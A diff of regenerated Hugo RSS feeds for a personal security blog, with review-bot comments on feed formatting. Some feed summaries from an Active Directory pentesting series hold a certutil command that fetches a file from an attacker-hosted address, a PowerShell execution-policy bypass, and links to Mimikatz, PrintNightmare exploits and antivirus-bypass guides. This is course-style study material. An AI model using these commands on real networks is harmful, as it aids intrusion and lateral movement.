This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs.
-
-
HoneyTrack
https://auti.dev/honeytrack/
Sat, 19 Aug 2023 14:28:54 +0530
-
https://auti.dev/honeytrack/
- Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently.
-HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network.
+ Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently.
HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network.
-
diff --git a/public/blog/honeypot/index.xml b/public/blog/honeypot/index.xml
index 59b43da..f08c51f 100644
--- a/public/blog/honeypot/index.xml
+++ b/public/blog/honeypot/index.xml
@@ -1,22 +1,20 @@
- honeypot on auti.dev ≽^._.^≼ ∫
+ Honeypot on auti.dev ≽^._.^≼ ∫
https://auti.dev/blog/honeypot/
- Recent content in honeypot on auti.dev ≽^._.^≼ ∫
- Hugo -- gohugo.io
+ Recent content in Honeypot on auti.dev ≽^._.^≼ ∫
+ Hugo
en-US
Copyright © 2023, Atharva Auti.
- Sat, 19 Aug 2023 14:28:54 +0530
+ Sat, 19 Aug 2023 14:28:54 +0530
+
-
HoneyTrack
https://auti.dev/honeytrack/
Sat, 19 Aug 2023 14:28:54 +0530
-
https://auti.dev/honeytrack/
- Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently.
-HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network.
+ Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently.
HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network.
-
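Review bot: `public/blog/honeypot/index.xml` is Hugo build output, and the generator line going from `Hugo -- gohugo.io` to `Hugo` together with the re-cased channel title suggests it was regenerated with a different Hugo version or template rather than edited by hand. Keeping `public/` in the repository means every rebuild touches each taxonomy feed in the same way; consider adding `public/` to `.gitignore` and publishing from CI, or at least pinning the Hugo version so the feed output is reproducible.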
diff --git a/public/blog/index.xml b/public/blog/index.xml
index 50a5198..52fe47a 100644
--- a/public/blog/index.xml
+++ b/public/blog/index.xml
@@ -4,91 +4,52 @@
Blogs on auti.dev ≽^._.^≼ ∫
https://auti.dev/blog/
Recent content in Blogs on auti.dev ≽^._.^≼ ∫
- Hugo -- gohugo.io
+ Hugo
en-US
Copyright © 2023, Atharva Auti.
- Tue, 17 Oct 2023 12:35:53 +0530
+ Tue, 17 Oct 2023 12:35:53 +0530
+
-
Demystifying Elastic SIEM
https://auti.dev/demystifying-elastic-siem/
Tue, 17 Oct 2023 12:35:53 +0530
-
https://auti.dev/demystifying-elastic-siem/
Introduction Hey there! Following my recent presentation at the Elastic Community Event, I’m thrilled to extend the insights into setting up Elastic for cybersecurity tools. In this blog, we’ll take a hands-on approach, providing a detailed guide on leveraging Elasticsearch and its toolkit. Our focus? Building a robust Security Information and Event Management (SIEM) tool, seamlessly incorporating Suricata, Wazuh, Windows Sysmon, network packet capture, and Apache Webserver. All of this orchestrated within the dependable Proxmox stack and Debian server containers.
-
-
Useful AD Resources
https://auti.dev/useful-ad-resources/
Fri, 20 Aug 2021 12:35:53 +0530
-
https://auti.dev/useful-ad-resources/
- Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases
-Mitm6: https://github.com/fox-it/mitm6
-Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
-Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
-Mimikatz: https://github.com/gentilkiwi/mimikatz
-PRET: https://github.com/RUB-NDS/PRET
-Praeda: https://github.com/percx/Praeda
-SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486)
-LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899))
-cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675
-calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675
-Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa
-Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/
-mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
-Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
-Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet
-A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/
-Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html
-GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/
+ Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases
Mitm6: https://github.com/fox-it/mitm6
Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
Mimikatz: https://github.com/gentilkiwi/mimikatz
PRET: https://github.com/RUB-NDS/PRET
Praeda: https://github.com/percx/Praeda
SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486)
LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899))
cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675
calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675
Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa
Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/
mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet
A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/
Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html
GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/
-
-
Compromising AD - Part 4: Post Exploitation
https://auti.dev/compromising-ad-part-4-post-exploitation/
Tue, 17 Aug 2021 12:35:53 +0530
-
https://auti.dev/compromising-ad-part-4-post-exploitation/
- Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil
-certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host
-python -m SimpleHTTPServer [port] Browser
-Navigate directly to the file (%20 for spaces) FTP
-On Attacker Machine
-python -m pyftpdlib 21 On Victim Machine, Browse to
+ Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil
certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host
python -m SimpleHTTPServer [port] Browser
Navigate directly to the file (%20 for spaces) FTP
On Attacker Machine
python -m pyftpdlib 21 On Victim Machine, Browse to
-
-
Compromising AD - Part 3: Post Compromise Attacks
https://auti.dev/compromising-ad-part-3-post-compromise-attacks/
Mon, 16 Aug 2021 12:35:53 +0530
-
https://auti.dev/compromising-ad-part-3-post-compromise-attacks/
Post-Compromise Attacks Post-Compromise Attacks passthehash ??? WTF Mitigations Token-Impersonation What are tokens? Two types Setup Mitigations Kerberoasting Kerberoast? Mitigations GPP-cPassword-Attacks Group Policy Preferences Attack aka MS14-025 Resources Setup Exploiting “Active” Machine on HacktheBox Privesc that Machine! Mitigations URL-File-Attacks SCF and URL file attack against writeable share Mitigations Print-Nightmare Resources Exploit Mitigation - just disable the damn service! Installation Exploit Mimikatz What’s that? Resources Exploit Golden-Ticket-Attack What is a Golden Ticket? Exploit Mitigations Zero-Logon aka CVE-2020-1472 Resources Exploit Mitigations Next >> Part 4: Post Exploitation passthehash If we crack a password and/or dump the SAM Hashes, we can leverage both for lateral movement in networks!
-
-
Compromising AD - Part 2: Post Compromise Enumeration
https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/
Sun, 15 Aug 2021 12:37:53 +0530
-
https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/
- Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
-Enumeration Load up a command prompt and cd into Downloads
-powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView
-. .\Powerview.ps1 Fundamental Commands
-Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy).
+ Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
Enumeration Load up a command prompt and cd into Downloads
powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView
. .\Powerview.ps1 Fundamental Commands
Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy).
-
-
Compromising AD - Part 1: Initial Attack Vectors
https://auti.dev/compromising-ad-part-1-initial-attack-vectors/
Sun, 15 Aug 2021 12:35:53 +0530
-
https://auti.dev/compromising-ad-part-1-initial-attack-vectors/
- Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure.
-Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense.
+ Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure.
Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense.
-
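Review bot: the item descriptions for the Compromising AD posts are auto-generated summaries that flatten the table of contents into the text and stop mid-sentence, e.g. `python -m pyftpdlib 21 On Victim Machine, Browse to` and `Registry Values (Get-DomainPolicy).`. Set an explicit `summary` or `description` in each post's front matter, or place a `<!--more-->` divider after the introduction, so feed readers get a readable abstract instead of headings and half a command list.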
diff --git a/public/blog/owasp/index.xml b/public/blog/owasp/index.xml
index bff08db..391458b 100644
--- a/public/blog/owasp/index.xml
+++ b/public/blog/owasp/index.xml
@@ -1,22 +1,20 @@
- owasp on auti.dev ≽^._.^≼ ∫
+ Owasp on auti.dev ≽^._.^≼ ∫
https://auti.dev/blog/owasp/
- Recent content in owasp on auti.dev ≽^._.^≼ ∫
- Hugo -- gohugo.io
+ Recent content in Owasp on auti.dev ≽^._.^≼ ∫
+ Hugo
en-US
Copyright © 2023, Atharva Auti.
- Wed, 15 Feb 2023 12:22:44 +0530
+ Wed, 15 Feb 2023 12:22:44 +0530
+
-
OWASP Top 10
https://auti.dev/owasp-top-10/
Wed, 15 Feb 2023 12:22:44 +0530
-
https://auti.dev/owasp-top-10/
- First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com
-I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications.
+ First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com
I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications.
-
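Review bot: the new channel title `Owasp on auti.dev` mis-cases an acronym; the title appears to be derived by title-casing the term name, which gives `Owasp` where the post itself is titled `OWASP Top 10`. Give the term an explicit title in the content source so the feed reads `OWASP`; the same applies to `Siem-Soc` in `public/blog/siem-soc/index.xml`.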
diff --git a/public/blog/purple-teaming/index.xml b/public/blog/purple-teaming/index.xml
index f8238d2..217db30 100644
--- a/public/blog/purple-teaming/index.xml
+++ b/public/blog/purple-teaming/index.xml
@@ -1,22 +1,20 @@
- purple-teaming on auti.dev ≽^._.^≼ ∫
+ Purple-Teaming on auti.dev ≽^._.^≼ ∫
https://auti.dev/blog/purple-teaming/
- Recent content in purple-teaming on auti.dev ≽^._.^≼ ∫
- Hugo -- gohugo.io
+ Recent content in Purple-Teaming on auti.dev ≽^._.^≼ ∫
+ Hugo
en-US
Copyright © 2023, Atharva Auti.
- Sat, 19 Aug 2023 14:28:54 +0530
+ Sat, 19 Aug 2023 14:28:54 +0530
+
-
HoneyTrack
https://auti.dev/honeytrack/
Sat, 19 Aug 2023 14:28:54 +0530
-
https://auti.dev/honeytrack/
- Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently.
-HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network.
+ Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently.
HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network.
-
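Review bot: the HoneyTrack description carried into this feed has the post's heading run into the first sentence (`Honeypot with a twist of Red Teaming With the tremendous growth ...`) and a broken clause in `which protect an organization’s database as well it backtracks the hacker`. This text is syndicated to every feed that lists the post, so fix the wording in the source post (for example `which protects an organization’s database and backtracks the hacker`) and regenerate.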
diff --git a/public/blog/red-teaming/index.xml b/public/blog/red-teaming/index.xml
index 936a7ee..58dca48 100644
--- a/public/blog/red-teaming/index.xml
+++ b/public/blog/red-teaming/index.xml
@@ -1,95 +1,55 @@
- red-teaming on auti.dev ≽^._.^≼ ∫
+ Red-Teaming on auti.dev ≽^._.^≼ ∫
https://auti.dev/blog/red-teaming/
- Recent content in red-teaming on auti.dev ≽^._.^≼ ∫
- Hugo -- gohugo.io
+ Recent content in Red-Teaming on auti.dev ≽^._.^≼ ∫
+ Hugo
en-US
Copyright © 2023, Atharva Auti.
- Wed, 15 Feb 2023 12:22:44 +0530
+ Wed, 15 Feb 2023 12:22:44 +0530
+
-
OWASP Top 10
https://auti.dev/owasp-top-10/
Wed, 15 Feb 2023 12:22:44 +0530
-
https://auti.dev/owasp-top-10/
- First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com
-I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications.
+ First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com
I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications.
-
-
Useful AD Resources
https://auti.dev/useful-ad-resources/
Fri, 20 Aug 2021 12:35:53 +0530
-
https://auti.dev/useful-ad-resources/
- Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases
-Mitm6: https://github.com/fox-it/mitm6
-Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
-Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
-Mimikatz: https://github.com/gentilkiwi/mimikatz
-PRET: https://github.com/RUB-NDS/PRET
-Praeda: https://github.com/percx/Praeda
-SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486)
-LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899))
-cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675
-calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675
-Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa
-Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/
-mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
-Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
-Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet
-A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/
-Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html
-GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/
+ Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases
Mitm6: https://github.com/fox-it/mitm6
Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
Mimikatz: https://github.com/gentilkiwi/mimikatz
PRET: https://github.com/RUB-NDS/PRET
Praeda: https://github.com/percx/Praeda
SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486)
LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899))
cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675
calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675
Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa
Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/
mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet
A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/
Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html
GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/
-
-
Compromising AD - Part 4: Post Exploitation
https://auti.dev/compromising-ad-part-4-post-exploitation/
Tue, 17 Aug 2021 12:35:53 +0530
-
https://auti.dev/compromising-ad-part-4-post-exploitation/
- Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil
-certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host
-python -m SimpleHTTPServer [port] Browser
-Navigate directly to the file (%20 for spaces) FTP
-On Attacker Machine
-python -m pyftpdlib 21 On Victim Machine, Browse to
+ Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil
certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host
python -m SimpleHTTPServer [port] Browser
Navigate directly to the file (%20 for spaces) FTP
On Attacker Machine
python -m pyftpdlib 21 On Victim Machine, Browse to
-
-
Compromising AD - Part 3: Post Compromise Attacks
https://auti.dev/compromising-ad-part-3-post-compromise-attacks/
Mon, 16 Aug 2021 12:35:53 +0530
-
https://auti.dev/compromising-ad-part-3-post-compromise-attacks/
Post-Compromise Attacks Post-Compromise Attacks passthehash ??? WTF Mitigations Token-Impersonation What are tokens? Two types Setup Mitigations Kerberoasting Kerberoast? Mitigations GPP-cPassword-Attacks Group Policy Preferences Attack aka MS14-025 Resources Setup Exploiting “Active” Machine on HacktheBox Privesc that Machine! Mitigations URL-File-Attacks SCF and URL file attack against writeable share Mitigations Print-Nightmare Resources Exploit Mitigation - just disable the damn service! Installation Exploit Mimikatz What’s that? Resources Exploit Golden-Ticket-Attack What is a Golden Ticket? Exploit Mitigations Zero-Logon aka CVE-2020-1472 Resources Exploit Mitigations Next >> Part 4: Post Exploitation passthehash If we crack a password and/or dump the SAM Hashes, we can leverage both for lateral movement in networks!
-
-
Compromising AD - Part 2: Post Compromise Enumeration
https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/
Sun, 15 Aug 2021 12:37:53 +0530
-
https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/
- Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
-Enumeration Load up a command prompt and cd into Downloads
-powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView
-. .\Powerview.ps1 Fundamental Commands
-Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy).
+ Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
Enumeration Load up a command prompt and cd into Downloads
powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView
. .\Powerview.ps1 Fundamental Commands
Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy).
-
-
Compromising AD - Part 1: Initial Attack Vectors
https://auti.dev/compromising-ad-part-1-initial-attack-vectors/
Sun, 15 Aug 2021 12:35:53 +0530
-
https://auti.dev/compromising-ad-part-1-initial-attack-vectors/
- Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure.
-Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense.
+ Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure.
Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense.
-
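Review bot: in the Useful AD Resources description, the `LAPS:` entry ends with an unbalanced `))`, and both it and `SYSVOL Script:` wrap the URL in parentheses, unlike the other entries in the list. That looks like a malformed Markdown link in the source post; fix the link syntax there so the feed and the page both carry a clean URL.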
diff --git a/public/blog/siem-soc/index.xml b/public/blog/siem-soc/index.xml
index 5317688..5e0c9fe 100644
--- a/public/blog/siem-soc/index.xml
+++ b/public/blog/siem-soc/index.xml
@@ -1,31 +1,27 @@
- siem-soc on auti.dev ≽^._.^≼ ∫
+ Siem-Soc on auti.dev ≽^._.^≼ ∫
https://auti.dev/blog/siem-soc/
- Recent content in siem-soc on auti.dev ≽^._.^≼ ∫
- Hugo -- gohugo.io
+ Recent content in Siem-Soc on auti.dev ≽^._.^≼ ∫
+ Hugo
en-US
Copyright © 2023, Atharva Auti.
- Tue, 17 Oct 2023 12:35:53 +0530
+ Tue, 17 Oct 2023 12:35:53 +0530
+
-
Demystifying Elastic SIEM
https://auti.dev/demystifying-elastic-siem/
Tue, 17 Oct 2023 12:35:53 +0530
-
https://auti.dev/demystifying-elastic-siem/
Introduction Hey there! Following my recent presentation at the Elastic Community Event, I’m thrilled to extend the insights into setting up Elastic for cybersecurity tools. In this blog, we’ll take a hands-on approach, providing a detailed guide on leveraging Elasticsearch and its toolkit. Our focus? Building a robust Security Information and Event Management (SIEM) tool, seamlessly incorporating Suricata, Wazuh, Windows Sysmon, network packet capture, and Apache Webserver. All of this orchestrated within the dependable Proxmox stack and Debian server containers.
-
-
Leveraging Cybersecurity using ElasticSearch
https://auti.dev/leveraging-cybersecurity-using-elasticsearch/
Tue, 17 Oct 2023 12:35:53 +0530
-
https://auti.dev/leveraging-cybersecurity-using-elasticsearch/
- First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com
-This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs.
+ First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com
This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs.
-
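Review bot: both items in this feed carry the identical timestamp `Tue, 17 Oct 2023 12:35:53 +0530`, although the second describes a talk given on 14th October 2023. With equal dates the order of the two entries is decided by tie-breaking rather than by the dates themselves; give each post its own `date` in front matter. The `12:35:53 +0530` time also recurs on the 2021 AD posts in `public/blog/index.xml`, which suggests the front matter was copied between posts.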
diff --git a/public/blog/tools/index.xml b/public/blog/tools/index.xml
index 8a2a5f0..07c2510 100644
--- a/public/blog/tools/index.xml
+++ b/public/blog/tools/index.xml
@@ -1,41 +1,34 @@
- tools on auti.dev ≽^._.^≼ ∫
+ Tools on auti.dev ≽^._.^≼ ∫
https://auti.dev/blog/tools/
- Recent content in tools on auti.dev ≽^._.^≼ ∫
- Hugo -- gohugo.io
+ Recent content in Tools on auti.dev ≽^._.^≼ ∫
+ Hugo
en-US
Copyright © 2023, Atharva Auti.
- Tue, 17 Oct 2023 12:35:53 +0530
+ Tue, 17 Oct 2023 12:35:53 +0530
+
-
Demystifying Elastic SIEM
https://auti.dev/demystifying-elastic-siem/
Tue, 17 Oct 2023 12:35:53 +0530
-
https://auti.dev/demystifying-elastic-siem/
Introduction Hey there! Following my recent presentation at the Elastic Community Event, I’m thrilled to extend the insights into setting up Elastic for cybersecurity tools. In this blog, we’ll take a hands-on approach, providing a detailed guide on leveraging Elasticsearch and its toolkit. Our focus? Building a robust Security Information and Event Management (SIEM) tool, seamlessly incorporating Suricata, Wazuh, Windows Sysmon, network packet capture, and Apache Webserver. All of this orchestrated within the dependable Proxmox stack and Debian server containers.
-
-
Leveraging Cybersecurity using ElasticSearch
https://auti.dev/leveraging-cybersecurity-using-elasticsearch/
Tue, 17 Oct 2023 12:35:53 +0530
-
https://auti.dev/leveraging-cybersecurity-using-elasticsearch/
- First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com
